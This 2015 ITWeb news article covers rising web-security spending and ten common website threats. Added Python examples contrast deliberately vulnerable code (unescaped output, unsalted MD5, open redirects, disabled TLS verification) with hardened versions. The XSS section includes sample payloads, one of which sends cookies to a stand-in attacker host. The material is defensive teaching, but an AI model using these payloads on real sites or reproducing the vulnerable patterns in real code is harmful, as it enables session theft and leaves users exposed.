
Unsafe Web browsing boosts security spend

By Regina Pazvakavambwa, ITWeb portals journalist.
Johannesburg, 28 Sept 2015
If a company knows what the threats are, it can arm itself appropriately and get one step ahead of the hackers, says Webafrica.

For companies building and running their own Web sites or who have an online business, the cyber world can be a dark and daunting place.

This is according to Myron Salant, Web services product manager at Webafrica, who notes cyber crime in the form of hacking could result in an organisation's Web site being blacklisted by Google - equating to a drop in search rankings, a damaged reputation, and a loss of revenue as the business tries to get its site back up.

A recent IHS report says the majority of threats enter networks through unsafe Web browsing, causing businesses to increase spending on Web security.

Other research by security firm AVG says a compromised Web site is still the most effective vector for installing malware on a computer, with the majority of malware installs occurring that way.

"The constant game of cat and mouse played by attacker and attacked leads to technology innovation and increased investment. The amount of growth ebbs and flows, but there is always growth," said Jeff Wilson, research director for cyber security technology at IHS.

For security technology vendors in a crowded market, the best way to stand out from the noise is to help buyers consolidate their disjointed security infrastructures.

They also must encourage companies to move security to the cloud, reduce threat exposure windows by embracing orchestration and automation, and discover even the most advanced threats, says Wilson.

In addition, Salant notes many Web site owners only think about security after their site gets hacked.

However, knowledge is power, says Salant, adding if a company knows what the threats are, it can arm itself appropriately and get one step ahead of the hackers.

Salant has identified the top 10 threats to a Web site that businesses should be aware of:

Injection

Injection happens when hostile data is sent to an interpreter as part of a query or command. The data tricks the interpreter into executing unintended commands or reading and altering data it should not. It's a common problem in Web applications, particularly as SQL injection, where user input is concatenated into a database query.

Cross-site scripting

When an application sends user-supplied data to a Web browser without first validating or encoding it, cross-site scripting can occur. This lets hackers execute scripts in the victim's browser that hijack user sessions or vandalise Web sites.
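The encoding step that paragraph refers to depends on where in the page the data lands. The following Python functions, added here as an example rather than taken from the article, render a user-supplied value into an HTML body, an attribute and a script block, each with the encoding that context needs. The three payloads are constructed for the example.

```python
import html
import json


def render_comment_vulnerable(comment: str) -> str:
    # User data is dropped straight into the markup, so tags in it are live.
    return '<div class="comment">%s</div>' % comment


def render_comment_safe(comment: str) -> str:
    # HTML body context: turn < > & " ' into entities before interpolating.
    return '<div class="comment">%s</div>' % html.escape(comment, quote=True)


def render_attr_safe(value: str) -> str:
    # Attribute context: always quote the attribute and escape quotes in the value,
    # so the input cannot close the attribute and add an event handler.
    return '<input name="q" value="%s">' % html.escape(value, quote=True)


def render_js_safe(value: str) -> str:
    # Script context: JSON-encode the value and neutralise "</" so the string
    # cannot terminate the <script> element early. A "<script>" inside a JS
    # string literal is inert; only "</script" matters to the HTML parser.
    encoded = json.dumps(value).replace("</", "<\\/")
    return "<script>var q = %s;</script>" % encoded


# Constructed payloads of the kind an attacker might submit as a "comment".
SCRIPT_PAYLOAD = '<script>location="https://attacker.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(1)'
JS_PAYLOAD = '</script><script>alert(1)</script>'


if __name__ == "__main__":
    print(render_comment_vulnerable(SCRIPT_PAYLOAD))
    print(render_comment_safe(SCRIPT_PAYLOAD))
    print(render_attr_safe(ATTR_PAYLOAD))
    print(render_js_safe(JS_PAYLOAD))
```

Input validation on its own is not enough: the same string can be harmless in one context and a working script in another, so the encoding has to be chosen at the point of output.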

Insecure direct object references

Web applications often expose a reference to an internal object, such as a database key or a file name, in a URL or form parameter, and don't always verify that the user is authorised for the object being requested. Without an access control check or similar protection, supposedly secure data can be accessed and stolen by attackers simply by changing that reference.

Cross-site request forgery (CSRF)

CSRF tricks a victim's logged-in browser into submitting forged HTTP requests to a vulnerable application, for example through a hidden form, an image tag or script on a page the attacker controls. It's an issue for Web applications that let an attacker predict every detail of a transaction: the URL, the parameters and the session cookie, which the browser attaches automatically. Attackers create hostile Web pages which generate forged requests indistinguishable from real ones.
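The standard defence is to add one detail the attacker cannot predict: a per-session token carried in the form, not in a cookie. The Python below is an added example, not code from the article or from Webafrica; the server key, session identifier and request dictionaries are constructed for it, and a real application would also set the SameSite attribute on its session cookie.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # assumed per-deployment secret, generated at start-up


def issue_csrf_token(session_id: str) -> str:
    # Random nonce plus an HMAC over (session, nonce): unpredictable and bound
    # to this session, so a token stolen from one user is useless against another.
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)   # constant-time comparison


def transfer_vulnerable(request: dict, session_id: str) -> str:
    # Relies on the session cookie alone; a forged cross-site request carries it automatically.
    if not session_id:
        return "401 no session"
    return "200 transferred %s to %s" % (request["form"]["amount"], request["form"]["to"])


def transfer_protected(request: dict, session_id: str) -> str:
    # The hidden form field is something the attacker's page can neither read nor guess.
    form = request.get("form", {})
    if request.get("method") != "POST" or not session_id:
        return "403 rejected"
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return "403 rejected"
    return "200 transferred %s to %s" % (form["amount"], form["to"])


def sample_requests(session_id: str) -> tuple:
    """Constructed requests: a genuine form submission and one a hostile page generated."""
    genuine = {"method": "POST",
               "form": {"csrf_token": issue_csrf_token(session_id), "amount": "100", "to": "bob"}}
    forged = {"method": "POST", "form": {"amount": "100", "to": "attacker"}}
    return genuine, forged


if __name__ == "__main__":
    sid = "sess-abc"
    genuine, forged = sample_requests(sid)
    print(transfer_vulnerable(forged, sid), "|", transfer_protected(forged, sid))
    print(transfer_protected(genuine, sid))
```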

Insecure cryptographic storage

It's hard to believe, but many Web applications still do not properly protect sensitive data such as credit card numbers and personal details, storing it unencrypted, encrypted with weak algorithms or keys, or hashed without a salt. Attackers who get hold of such data can easily recover it and use it to commit credit card fraud, identity theft and other data-related crimes.
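Password storage is the most common instance of this. The Python below is an added example, not code from the article: an unsalted MD5 record next to a salted, iterated PBKDF2 record that carries its own parameters. The iteration count is an assumed value. Reversible data such as card numbers needs authenticated encryption under a managed key, which the standard library does not provide, so that case is not shown here.

```python
import hashlib
import hmac
import os
from typing import Optional

ITERATIONS = 600_000   # assumed work factor for PBKDF2-HMAC-SHA256; raise it as hardware gets faster


def store_weak(password: str) -> str:
    # Unsalted fast hash: equal passwords produce equal records, and precomputed
    # tables or a GPU crack a leaked copy offline.
    return hashlib.md5(password.encode()).hexdigest()


def store_strong(password: str, salt: Optional[bytes] = None) -> str:
    # Random per-user salt plus a slow, iterated hash. The record carries everything
    # needed to verify later, so the work factor can be raised without a migration.
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())


def verify_strong(password: str, stored: str) -> bool:
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _, iterations, salt_hex, digest_hex = parts
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)   # constant-time comparison


if __name__ == "__main__":
    print(store_weak("password"), store_weak("password"))   # identical: no salt
    print(store_strong("password"))
    print(store_strong("password"))                          # different salt, different record
```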

Failure to restrict URL access

An application may protect sensitive functionality only by not displaying the relevant URLs or links to unauthorised users. By guessing or otherwise discovering those URLs and requesting them directly, attackers can exploit this weakness to perform unauthorised operations.
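Both the insecure direct object reference item above and this one come down to the same missing check, one on the object and one on the route. The Python below, added here as an example and not taken from the article, shows a lookup that trusts the identifier from the URL beside one that checks ownership, and a dispatcher that denies any path not explicitly mapped to a role. The invoice records, users and routes are constructed for the example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    role: str   # "user" or "admin"


# Constructed records; in a real application these come from the database.
INVOICES = {101: {"owner_id": 1, "total": 250.0},
            102: {"owner_id": 2, "total": 99.0}}


class Forbidden(Exception):
    pass


def get_invoice_vulnerable(invoice_id: int) -> dict:
    # Trusts the identifier from the URL: any logged-in user can read any invoice
    # by editing /invoice/101 to /invoice/102.
    return INVOICES[invoice_id]


def get_invoice(current: User, invoice_id: int) -> dict:
    # Object-level check: the caller must own the record or hold the admin role.
    inv = INVOICES.get(invoice_id)
    if inv is None or (inv["owner_id"] != current.id and current.role != "admin"):
        raise Forbidden   # same response whether the id is missing or not owned
    return inv


# Function-level check for "hidden" URLs: a route not listed here is denied to everyone,
# so forgetting to register a new admin page fails closed rather than open.
ROUTE_ROLES = {"/account": {"user", "admin"}, "/admin/users": {"admin"}}


def dispatch(current: User, path: str) -> str:
    allowed_roles = ROUTE_ROLES.get(path, set())
    if current.role not in allowed_roles:
        raise Forbidden
    return "OK " + path


def allowed(fn, *args) -> bool:
    """True if the call succeeds, False if access control rejects it."""
    try:
        fn(*args)
        return True
    except Forbidden:
        return False


if __name__ == "__main__":
    alice, admin = User(1, "user"), User(9, "admin")
    print(allowed(get_invoice, alice, 102), allowed(get_invoice, admin, 102))
    print(allowed(dispatch, alice, "/admin/users"), allowed(dispatch, admin, "/admin/users"))
```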

Unvalidated redirects and forwards

Web applications may redirect or forward visitors to other pages and Web sites without validating the target. Attackers can then redirect victims to phishing or malware sites, or use forwards to reach pages they are not authorised to see.
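The usual shape of this flaw is a `?next=` parameter copied straight into the Location header. The Python below is an added example, not from the article: a validator that resolves the requested target against the site's own origin, rejects foreign hosts and non-HTTP schemes, and returns only a path. The site address and the sample targets are assumed values.

```python
from urllib.parse import urljoin, urlparse

SITE_BASE = "https://shop.example.com/"   # assumed: the application's own origin
ALLOWED_HOSTS = {"shop.example.com"}


def redirect_vulnerable(next_url: str) -> str:
    # Whatever arrived in ?next= becomes the Location header.
    return next_url


def safe_redirect_target(next_url: str, default: str = "/") -> str:
    # Resolve against our own origin so scheme-relative ("//evil") and
    # backslash ("/\\evil") forms become absolute URLs we can inspect.
    resolved = urljoin(SITE_BASE, next_url.replace("\\", "/"))
    parts = urlparse(resolved)
    # hostname strips userinfo and port, so "https://shop.example.com@evil.example/"
    # is seen as evil.example and rejected.
    if parts.scheme not in ("http", "https") or parts.hostname not in ALLOWED_HOSTS:
        return default
    # Hand back only path and query: the browser stays on our origin whatever was sent.
    target = parts.path + ("?" + parts.query if parts.query else "")
    return target or default


if __name__ == "__main__":
    # Constructed attacker-supplied values
    for candidate in ["/account?tab=orders", "//evil.example/phish",
                      "https://shop.example.com@evil.example/", "javascript:alert(1)",
                      "/\\evil.example/x"]:
        print(repr(candidate), "->", safe_redirect_target(candidate))
```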

Broken authentication and session management

Account credentials and session tokens are sometimes not properly protected. Attackers simply use stolen passwords, keys and authentication tokens to steal other users' identities and commit crimes.
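Most session-handling mistakes are about the token itself: predictable values, no expiry, or an identifier that survives login so an attacker can plant it in advance. The Python below is an added example rather than code from the article; it keeps sessions in memory with an injected clock so the idle timeout can be exercised, and the timeout value is assumed.

```python
import secrets
import time
from typing import Optional

SESSION_TTL = 15 * 60   # idle timeout in seconds (assumed policy)


class SessionStore:
    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions = {}   # token -> {"user": ..., "last_seen": ...}

    def create(self, user: str) -> str:
        # 256 bits from the OS CSPRNG; never derived from a counter, time or user data.
        token = secrets.token_urlsafe(32)
        self._sessions[token] = {"user": user, "last_seen": self._clock()}
        return token

    def resolve(self, token: str) -> Optional[str]:
        # Returns the user for a live token, or None for unknown or expired ones.
        s = self._sessions.get(token)
        if s is None:
            return None
        if self._clock() - s["last_seen"] > SESSION_TTL:
            del self._sessions[token]   # expired: treat as logged out
            return None
        s["last_seen"] = self._clock()
        return s["user"]

    def login(self, old_token: Optional[str], user: str) -> str:
        # Rotate the identifier when privilege changes, so a token the attacker
        # fixed in the victim's browser before login never becomes authenticated.
        if old_token in self._sessions:
            del self._sessions[old_token]
        return self.create(user)

    def logout(self, token: str) -> None:
        # Invalidate server-side; clearing the cookie alone leaves the token usable.
        self._sessions.pop(token, None)


if __name__ == "__main__":
    store = SessionStore()
    t = store.login(None, "alice")
    print(store.resolve(t))
    store.logout(t)
    print(store.resolve(t))
```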

Security misconfiguration

Attackers exploit configuration weaknesses at any level, whether in the platform, Web server, application server, framework or custom code. These flaws give attackers access to default accounts, unused pages, unpatched flaws, unprotected files and directories, and system data.

Insufficient transport layer protection

When applications fail to authenticate, encrypt and protect sensitive network traffic, they may fall back to weak algorithms or protocol versions, use expired or invalid certificates, or use them incorrectly, for example by not checking the certificate chain or the host name it was issued for.
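On the client side this usually means a TLS context with verification switched off "to make it work". The Python below is an added example, not from the article: the weak context beside a hardened one, and a small review function that reports which of the checks in that paragraph a context skips. The protocol floor of TLS 1.2 is the assumed policy.

```python
import ssl


def weak_client_context() -> ssl.SSLContext:
    # Common shortcut: disable verification so an expired or self-signed
    # certificate "works". Any on-path attacker can now impersonate the server.
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False       # must be cleared before verify_mode can be CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_client_context() -> ssl.SSLContext:
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2   # refuse SSLv3, TLS 1.0 and 1.1
    ctx.verify_mode = ssl.CERT_REQUIRED            # reject chains that do not verify
    ctx.check_hostname = True                      # certificate must match the host name
    ctx.load_default_certs()                       # trust the system CA store
    return ctx


def assess(ctx: ssl.SSLContext) -> list:
    """Return the weaknesses a reviewer would flag in a client-side TLS context."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("certificate chain not verified")
    if not ctx.check_hostname:
        findings.append("host name not checked against certificate")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("protocol versions below TLS 1.2 accepted")
    return findings


if __name__ == "__main__":
    print("weak:", assess(weak_client_context()))
    print("hardened:", assess(hardened_client_context()))
```

Whether the weak context also accepts TLS 1.0 depends on the OpenSSL build it runs on, which is exactly why the floor is set explicitly in the hardened one rather than left to the library default.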
